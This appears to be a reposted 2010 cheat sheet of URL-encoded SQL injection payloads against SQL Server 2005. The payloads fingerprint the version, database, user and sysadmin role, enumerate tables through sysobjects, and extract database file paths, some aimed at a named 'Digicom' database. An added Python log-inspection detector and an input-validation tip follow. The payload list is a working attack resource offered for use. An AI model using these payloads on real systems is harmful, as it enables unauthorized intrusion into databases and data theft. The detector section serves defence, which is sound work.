    SQL2005 injection statements



    • Date compiled: 2010-05-22

    ID=1458%20and%20@@version%3D0 determine the version
    ID=1458%20and%20db_name%28%29%3D0  database name
    ID=1458%20and%20@@servername%3D0 server name
    ID=1458%20and%20system_user%3D0  system user name
    ID=1458%20and%20user%3D0 privilege: DBO or PUBLIC
    ID=1458%20and%20quotename%28is_srvrolemember%280x730079007300610064006D0069006E00%29%29%3D0  whether sysadmin: 1 = yes, 0 = no
    ID=1458%20and%20quotename%28db_name%281%29%29%3D0  determine the databases
    ID=1458%20and%20quotename%28db_name%282%29%29%3D0
    ID=1458%20and%20quotename%28db_name%283%29%29%3D0


    ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2032%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0
    ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2033%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0


    After decoding, this is:
    ID=1458 and (select top 1 quotename(name) from Digicom.dbo.sysobjects where type=U AND name not in (select top 33 name from Digicom.dbo.sysobjects where type=U))=0

    The following is from Pangolin:
    /add_item.asp?ID=1458%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([filename]%20as%20nvarchar(4000))%20from(select%20top%20%201%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
    This obtains the path of the database files.

    Reposted from: KeLe's Blog http://52crack.com/
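
    A defender-side check for the requests listed above, as an added example that is not part of the original article: it parses the query string of logged request paths and reports when the ID parameter, which should be a plain integer, carries the T-SQL names these probes rely on, and it decodes 0x literals as UTF-16LE so the hidden string is readable. The function names and the sample request list are constructed for illustration; the fourth sample is an abridged form of the sysobjects request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# T-SQL names taken from the requests listed on this page.
INDICATORS = {
    "server variable": re.compile(r"@@(version|servername)\b", re.I),
    "identity function": re.compile(
        r"\b(db_name|system_user|is_srvrolemember|quotename)\b|\buser\s*=", re.I),
    "catalog table": re.compile(r"\bsys(objects|databases)\b", re.I),
    "subquery": re.compile(r"\(\s*select\b", re.I),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.I)


def decode_hex_literals(text):
    """Decode 0x... literals as UTF-16LE, the encoding of T-SQL nvarchar."""
    return [bytes.fromhex(h).decode("utf-16-le", errors="replace")
            for h in HEX_LITERAL.findall(text)]


def inspect_request(url, numeric_params=("id",)):
    """Return {param: [reasons]} for numeric parameters that carry SQL text."""
    findings = {}
    # parse_qsl percent-decodes, so %20, %28, %3D etc. become plain characters
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() not in numeric_params or value.strip().isdigit():
            continue  # not a watched parameter, or a clean integer
        reasons = [label for label, rx in INDICATORS.items() if rx.search(value)]
        reasons += [f"hex literal: {s}" for s in decode_hex_literals(value)]
        findings[name] = reasons or ["non-numeric value"]
    return findings


# Constructed access-log paths: one normal request, then requests from this page.
SAMPLE_REQUESTS = [
    "/add_item.asp?ID=1458",
    "/add_item.asp?ID=1458%20and%20@@version%3D0",
    "/add_item.asp?ID=1458%20and%20quotename%28is_srvrolemember"
    "%280x730079007300610064006D0069006E00%29%29%3D0",
    "/add_item.asp?ID=1458%20and%20%28select%20top%201%20quotename%28name%29"
    "%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%3D0",
]

if __name__ == "__main__":
    for path in SAMPLE_REQUESTS:
        print(path[:60], "->", inspect_request(path) or "ok")
```

    Applying the same integer check in the application before the query is built, or binding ID as a typed parameter, stops every request in this list at input validation instead of at the database.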

     


